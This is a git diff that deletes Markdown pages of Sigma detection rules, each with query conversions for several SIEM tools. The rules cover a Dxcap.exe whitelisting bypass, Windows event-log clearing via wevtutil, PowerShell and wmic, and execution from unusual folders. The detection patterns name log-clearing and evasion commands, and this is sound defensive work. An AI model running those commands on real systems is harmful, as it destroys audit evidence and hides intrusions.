-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\dxcap.exe" -and $_.message -match "CommandLine.*.*-c.*" -and $_.message -match "CommandLine.*.*.exe.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\dxcap.exe AND winlog.event_data.CommandLine.keyword:*\-c* AND winlog.event_data.CommandLine.keyword:*.exe*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/60f16a96-db70-42eb-8f76-16763e333590 <<EOF
-{
-  "metadata": {
-    "title": "Application Whitelisting Bypass via Dxcap.exe",
-    "description": "Detects execution of of Dxcap.exe",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1218"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\dxcap.exe AND winlog.event_data.CommandLine.keyword:*\\-c* AND winlog.event_data.CommandLine.keyword:*.exe*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\dxcap.exe AND winlog.event_data.CommandLine.keyword:*\\-c* AND winlog.event_data.CommandLine.keyword:*.exe*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Application Whitelisting Bypass via Dxcap.exe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\dxcap.exe AND CommandLine.keyword:*\-c* AND CommandLine.keyword:*.exe*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\dxcap.exe" CommandLine="*-c*" CommandLine="*.exe*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\dxcap.exe" CommandLine="*-c*" CommandLine="*.exe*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\dxcap\.exe)(?=.*.*-c.*)(?=.*.*\.exe.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_eventlog_clear.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_eventlog_clear.md
deleted file mode 100644
index 927ccdd..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_eventlog_clear.md
+++ /dev/null
@@ -1,193 +0,0 @@
-| Title                    | Suspicious Eventlog Clear or Configuration Using Wevtutil       |
-|:-------------------------|:------------------|
-| **Description**          | Detects clearing or configuration of eventlogs uwing wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1070: Indicator Removal on Host](https://attack.mitre.org/techniques/T1070)</li><li>[T1551: None](https://attack.mitre.org/techniques/T1551)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1551: None](../Triggers/T1551.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Admin activity</li><li>Scripts and administrative tools used in the monitored environment</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.yaml)</li><li>[https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html](https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html)</li></ul>  |
-| **Author**               | Ecco, Daniil Yugoslavskiy, oscd.community |
-| Other Tags           | <ul><li>car.2016-04-002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Eventlog Clear or Configuration Using Wevtutil
-id: cc36992a-4671-4f21-a91d-6c2b72a2edf5
-description: Detects clearing or configuration of eventlogs uwing wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others)
-author: Ecco, Daniil Yugoslavskiy, oscd.community
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.yaml
-    - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html
-date: 2019/09/26
-modified: 2019/11/11
-tags:
-    - attack.defense_evasion
-    - attack.t1070
-    - car.2016-04-002
-    - attack.t1551
-level: high
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_wevtutil_binary:
-        Image|endswith: '\wevtutil.exe'
-    selection_wevtutil_command:
-        CommandLine|contains:
-            - 'clear-log' # clears specified log
-            - ' cl '        # short version of 'clear-log'
-            - 'set-log'   # modifies config of specified log. could be uset to set it to a tiny size
-            - ' sl '        # short version of 'set-log'
-    selection_other_ps:
-        Image|endswith: '\powershell.exe'
-        CommandLine|contains:
-            - 'Clear-EventLog'
-            - 'Remove-EventLog'
-            - 'Limit-EventLog'
-    selection_other_wmic:
-        Image|endswith: '\wmic.exe'
-        CommandLine|contains: ' ClearEventLog '
-    condition: 1 of selection_other_* or (selection_wevtutil_binary and selection_wevtutil_command)
-falsepositives:
-    - Admin activity
-    - Scripts and administrative tools used in the monitored environment
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ((($_.message -match "Image.*.*\\powershell.exe" -and ($_.message -match "CommandLine.*.*Clear-EventLog.*" -or $_.message -match "CommandLine.*.*Remove-EventLog.*" -or $_.message -match "CommandLine.*.*Limit-EventLog.*")) -or ($_.message -match "Image.*.*\\wmic.exe" -and $_.message -match "CommandLine.*.* ClearEventLog .*")) -or ($_.ID -eq "1" -and $_.message -match "Image.*.*\\wevtutil.exe" -and ($_.message -match "CommandLine.*.*clear-log.*" -or $_.message -match "CommandLine.*.* cl .*" -or $_.message -match "CommandLine.*.*set-log.*" -or $_.message -match "CommandLine.*.* sl .*")))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(((winlog.event_data.Image.keyword:*\\powershell.exe AND winlog.event_data.CommandLine.keyword:(*Clear\-EventLog* OR *Remove\-EventLog* OR *Limit\-EventLog*)) OR (winlog.event_data.Image.keyword:*\\wmic.exe AND winlog.event_data.CommandLine.keyword:*\ ClearEventLog\ *)) OR (winlog.event_data.Image.keyword:*\\wevtutil.exe AND winlog.event_data.CommandLine.keyword:(*clear\-log* OR *\ cl\ * OR *set\-log* OR *\ sl\ *)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/cc36992a-4671-4f21-a91d-6c2b72a2edf5 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Eventlog Clear or Configuration Using Wevtutil",
-    "description": "Detects clearing or configuration of eventlogs uwing wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others)",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1070",
-      "car.2016-04-002",
-      "attack.t1551"
-    ],
-    "query": "(((winlog.event_data.Image.keyword:*\\\\powershell.exe AND winlog.event_data.CommandLine.keyword:(*Clear\\-EventLog* OR *Remove\\-EventLog* OR *Limit\\-EventLog*)) OR (winlog.event_data.Image.keyword:*\\\\wmic.exe AND winlog.event_data.CommandLine.keyword:*\\ ClearEventLog\\ *)) OR (winlog.event_data.Image.keyword:*\\\\wevtutil.exe AND winlog.event_data.CommandLine.keyword:(*clear\\-log* OR *\\ cl\\ * OR *set\\-log* OR *\\ sl\\ *)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(((winlog.event_data.Image.keyword:*\\\\powershell.exe AND winlog.event_data.CommandLine.keyword:(*Clear\\-EventLog* OR *Remove\\-EventLog* OR *Limit\\-EventLog*)) OR (winlog.event_data.Image.keyword:*\\\\wmic.exe AND winlog.event_data.CommandLine.keyword:*\\ ClearEventLog\\ *)) OR (winlog.event_data.Image.keyword:*\\\\wevtutil.exe AND winlog.event_data.CommandLine.keyword:(*clear\\-log* OR *\\ cl\\ * OR *set\\-log* OR *\\ sl\\ *)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Eventlog Clear or Configuration Using Wevtutil'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(((Image.keyword:*\\powershell.exe AND CommandLine.keyword:(*Clear\-EventLog* *Remove\-EventLog* *Limit\-EventLog*)) OR (Image.keyword:*\\wmic.exe AND CommandLine.keyword:* ClearEventLog *)) OR (Image.keyword:*\\wevtutil.exe AND CommandLine.keyword:(*clear\-log* * cl * *set\-log* * sl *)))
-```
-
-
-### splunk
-    
-```
-(((Image="*\\powershell.exe" (CommandLine="*Clear-EventLog*" OR CommandLine="*Remove-EventLog*" OR CommandLine="*Limit-EventLog*")) OR (Image="*\\wmic.exe" CommandLine="* ClearEventLog *")) OR (Image="*\\wevtutil.exe" (CommandLine="*clear-log*" OR CommandLine="* cl *" OR CommandLine="*set-log*" OR CommandLine="* sl *")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (((Image="*\\powershell.exe" CommandLine IN ["*Clear-EventLog*", "*Remove-EventLog*", "*Limit-EventLog*"]) OR (Image="*\\wmic.exe" CommandLine="* ClearEventLog *")) OR (event_id="1" Image="*\\wevtutil.exe" CommandLine IN ["*clear-log*", "* cl *", "*set-log*", "* sl *"])))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?:.*(?:.*(?=.*.*\powershell\.exe)(?=.*(?:.*.*Clear-EventLog.*|.*.*Remove-EventLog.*|.*.*Limit-EventLog.*)))|.*(?:.*(?=.*.*\wmic\.exe)(?=.*.* ClearEventLog .*))))|.*(?:.*(?=.*.*\wevtutil\.exe)(?=.*(?:.*.*clear-log.*|.*.* cl .*|.*.*set-log.*|.*.* sl .*)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_eventlog_cleared.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_eventlog_cleared.md
deleted file mode 100644
index c46be1a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_eventlog_cleared.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Eventlog Cleared       |
-|:-------------------------|:------------------|
-| **Description**          | One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1070: Indicator Removal on Host](https://attack.mitre.org/techniques/T1070)</li><li>[T1551: None](https://attack.mitre.org/techniques/T1551)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1551: None](../Triggers/T1551.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://twitter.com/deviouspolack/status/832535435960209408](https://twitter.com/deviouspolack/status/832535435960209408)</li><li>[https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100](https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>car.2016-04-002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Eventlog Cleared
-id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982
-description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution
-references:
-    - https://twitter.com/deviouspolack/status/832535435960209408
-    - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
-author: Florian Roth
-date: 2017/01/10
-tags:
-    - attack.defense_evasion
-    - attack.t1070
-    - car.2016-04-002
-    - attack.t1551
-logsource:
-    product: windows
-    service: system
-detection:
-    selection:
-        EventID: 104
-        Source: Microsoft-Windows-Eventlog
-    condition: selection
-falsepositives:
-    - Unknown
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {($_.ID -eq "104" -and $_.message -match "Source.*Microsoft-Windows-Eventlog") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"104" AND winlog.event_data.Source:"Microsoft\-Windows\-Eventlog")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d99b79d2-0a6f-4f46-ad8b-260b6e17f982 <<EOF
-{
-  "metadata": {
-    "title": "Eventlog Cleared",
-    "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1070",
-      "car.2016-04-002",
-      "attack.t1551"
-    ],
-    "query": "(winlog.event_id:\"104\" AND winlog.event_data.Source:\"Microsoft\\-Windows\\-Eventlog\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"104\" AND winlog.event_data.Source:\"Microsoft\\-Windows\\-Eventlog\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Eventlog Cleared'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"104" AND Source:"Microsoft\-Windows\-Eventlog")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" EventCode="104" Source="Microsoft-Windows-Eventlog")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="104" Source="Microsoft-Windows-Eventlog")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*104)(?=.*Microsoft-Windows-Eventlog))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_exec_folder.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_exec_folder.md
deleted file mode 100644
index adc751a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_exec_folder.md
+++ /dev/null
@@ -1,193 +0,0 @@
-| Title                    | Executables Started in Suspicious Folder       |
-|:-------------------------|:------------------|
-| **Description**          | Detects process starts of binaries from a suspicious folder |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/mbevilacqua/appcompatprocessor/blob/master/AppCompatSearch.txt](https://github.com/mbevilacqua/appcompatprocessor/blob/master/AppCompatSearch.txt)</li><li>[https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses](https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses)</li><li>[https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/](https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/)</li><li>[https://github.com/ThreatHuntingProject/ThreatHunting/blob/master/hunts/suspicious_process_creation_via_windows_event_logs.md](https://github.com/ThreatHuntingProject/ThreatHunting/blob/master/hunts/suspicious_process_creation_via_windows_event_logs.md)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Executables Started in Suspicious Folder
-id: 7a38aa19-86a9-4af7-ac51-6bfe4e59f254
-status: experimental
-description: Detects process starts of binaries from a suspicious folder
-author: Florian Roth
-date: 2017/10/14
-modified: 2019/02/21
-references:
-    - https://github.com/mbevilacqua/appcompatprocessor/blob/master/AppCompatSearch.txt
-    - https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses
-    - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
-    - https://github.com/ThreatHuntingProject/ThreatHunting/blob/master/hunts/suspicious_process_creation_via_windows_event_logs.md
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image:
-            - C:\PerfLogs\\*
-            - C:\$Recycle.bin\\*
-            - C:\Intel\Logs\\*
-            - C:\Users\Default\\*
-            - C:\Users\Public\\*
-            - C:\Users\NetworkService\\*
-            - C:\Windows\Fonts\\*
-            - C:\Windows\Debug\\*
-            - C:\Windows\Media\\*
-            - C:\Windows\Help\\*
-            - C:\Windows\addins\\*
-            - C:\Windows\repair\\*
-            - C:\Windows\security\\*
-            - '*\RSA\MachineKeys\\*'
-            - C:\Windows\system32\config\systemprofile\\*
-            - C:\Windows\Tasks\\*
-            - C:\Windows\System32\Tasks\\*
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*C:\\PerfLogs\\.*" -or $_.message -match "Image.*C:\\$Recycle.bin\\.*" -or $_.message -match "Image.*C:\\Intel\\Logs\\.*" -or $_.message -match "Image.*C:\\Users\\Default\\.*" -or $_.message -match "Image.*C:\\Users\\Public\\.*" -or $_.message -match "Image.*C:\\Users\\NetworkService\\.*" -or $_.message -match "Image.*C:\\Windows\\Fonts\\.*" -or $_.message -match "Image.*C:\\Windows\\Debug\\.*" -or $_.message -match "Image.*C:\\Windows\\Media\\.*" -or $_.message -match "Image.*C:\\Windows\\Help\\.*" -or $_.message -match "Image.*C:\\Windows\\addins\\.*" -or $_.message -match "Image.*C:\\Windows\\repair\\.*" -or $_.message -match "Image.*C:\\Windows\\security\\.*" -or $_.message -match "Image.*.*\\RSA\\MachineKeys\\.*" -or $_.message -match "Image.*C:\\Windows\\system32\\config\\systemprofile\\.*" -or $_.message -match "Image.*C:\\Windows\\Tasks\\.*" -or $_.message -match "Image.*C:\\Windows\\System32\\Tasks\\.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.Image.keyword:(C\:\\PerfLogs\\* OR C\:\\$Recycle.bin\\* OR C\:\\Intel\\Logs\\* OR C\:\\Users\\Default\\* OR C\:\\Users\\Public\\* OR C\:\\Users\\NetworkService\\* OR C\:\\Windows\\Fonts\\* OR C\:\\Windows\\Debug\\* OR C\:\\Windows\\Media\\* OR C\:\\Windows\\Help\\* OR C\:\\Windows\\addins\\* OR C\:\\Windows\\repair\\* OR C\:\\Windows\\security\\* OR *\\RSA\\MachineKeys\\* OR C\:\\Windows\\system32\\config\\systemprofile\\* OR C\:\\Windows\\Tasks\\* OR C\:\\Windows\\System32\\Tasks\\*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/7a38aa19-86a9-4af7-ac51-6bfe4e59f254 <<EOF
-{
-  "metadata": {
-    "title": "Executables Started in Suspicious Folder",
-    "description": "Detects process starts of binaries from a suspicious folder",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036"
-    ],
-    "query": "winlog.event_data.Image.keyword:(C\\:\\\\PerfLogs\\\\* OR C\\:\\\\$Recycle.bin\\\\* OR C\\:\\\\Intel\\\\Logs\\\\* OR C\\:\\\\Users\\\\Default\\\\* OR C\\:\\\\Users\\\\Public\\\\* OR C\\:\\\\Users\\\\NetworkService\\\\* OR C\\:\\\\Windows\\\\Fonts\\\\* OR C\\:\\\\Windows\\\\Debug\\\\* OR C\\:\\\\Windows\\\\Media\\\\* OR C\\:\\\\Windows\\\\Help\\\\* OR C\\:\\\\Windows\\\\addins\\\\* OR C\\:\\\\Windows\\\\repair\\\\* OR C\\:\\\\Windows\\\\security\\\\* OR *\\\\RSA\\\\MachineKeys\\\\* OR C\\:\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\* OR C\\:\\\\Windows\\\\Tasks\\\\* OR C\\:\\\\Windows\\\\System32\\\\Tasks\\\\*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.Image.keyword:(C\\:\\\\PerfLogs\\\\* OR C\\:\\\\$Recycle.bin\\\\* OR C\\:\\\\Intel\\\\Logs\\\\* OR C\\:\\\\Users\\\\Default\\\\* OR C\\:\\\\Users\\\\Public\\\\* OR C\\:\\\\Users\\\\NetworkService\\\\* OR C\\:\\\\Windows\\\\Fonts\\\\* OR C\\:\\\\Windows\\\\Debug\\\\* OR C\\:\\\\Windows\\\\Media\\\\* OR C\\:\\\\Windows\\\\Help\\\\* OR C\\:\\\\Windows\\\\addins\\\\* OR C\\:\\\\Windows\\\\repair\\\\* OR C\\:\\\\Windows\\\\security\\\\* OR *\\\\RSA\\\\MachineKeys\\\\* OR C\\:\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\* OR C\\:\\\\Windows\\\\Tasks\\\\* OR C\\:\\\\Windows\\\\System32\\\\Tasks\\\\*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Executables Started in Suspicious Folder'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Image.keyword:(C\:\\PerfLogs\\* C\:\\$Recycle.bin\\* C\:\\Intel\\Logs\\* C\:\\Users\\Default\\* C\:\\Users\\Public\\* C\:\\Users\\NetworkService\\* C\:\\Windows\\Fonts\\* C\:\\Windows\\Debug\\* C\:\\Windows\\Media\\* C\:\\Windows\\Help\\* C\:\\Windows\\addins\\* C\:\\Windows\\repair\\* C\:\\Windows\\security\\* *\\RSA\\MachineKeys\\* C\:\\Windows\\system32\\config\\systemprofile\\* C\:\\Windows\\Tasks\\* C\:\\Windows\\System32\\Tasks\\*)
-```
-
-
-### splunk
-    
-```
-(Image="C:\\PerfLogs\\*" OR Image="C:\\$Recycle.bin\\*" OR Image="C:\\Intel\\Logs\\*" OR Image="C:\\Users\\Default\\*" OR Image="C:\\Users\\Public\\*" OR Image="C:\\Users\\NetworkService\\*" OR Image="C:\\Windows\\Fonts\\*" OR Image="C:\\Windows\\Debug\\*" OR Image="C:\\Windows\\Media\\*" OR Image="C:\\Windows\\Help\\*" OR Image="C:\\Windows\\addins\\*" OR Image="C:\\Windows\\repair\\*" OR Image="C:\\Windows\\security\\*" OR Image="*\\RSA\\MachineKeys\\*" OR Image="C:\\Windows\\system32\\config\\systemprofile\\*" OR Image="C:\\Windows\\Tasks\\*" OR Image="C:\\Windows\\System32\\Tasks\\*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["C:\\PerfLogs\\*", "C:\\$Recycle.bin\\*", "C:\\Intel\\Logs\\*", "C:\\Users\\Default\\*", "C:\\Users\\Public\\*", "C:\\Users\\NetworkService\\*", "C:\\Windows\\Fonts\\*", "C:\\Windows\\Debug\\*", "C:\\Windows\\Media\\*", "C:\\Windows\\Help\\*", "C:\\Windows\\addins\\*", "C:\\Windows\\repair\\*", "C:\\Windows\\security\\*", "*\\RSA\\MachineKeys\\*", "C:\\Windows\\system32\\config\\systemprofile\\*", "C:\\Windows\\Tasks\\*", "C:\\Windows\\System32\\Tasks\\*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*C:\PerfLogs\\.*|.*C:\\$Recycle\.bin\\.*|.*C:\Intel\Logs\\.*|.*C:\Users\Default\\.*|.*C:\Users\Public\\.*|.*C:\Users\NetworkService\\.*|.*C:\Windows\Fonts\\.*|.*C:\Windows\Debug\\.*|.*C:\Windows\Media\\.*|.*C:\Windows\Help\\.*|.*C:\Windows\addins\\.*|.*C:\Windows\repair\\.*|.*C:\Windows\security\\.*|.*.*\RSA\MachineKeys\\.*|.*C:\Windows\system32\config\systemprofile\\.*|.*C:\Windows\Tasks\\.*|.*C:\Windows\System32\Tasks\\.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_execution_path.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_execution_path.md
deleted file mode 100644
index 17b2be5..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_execution_path.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | Execution in Non-Executable Folder       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious exection from an uncommon folder |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
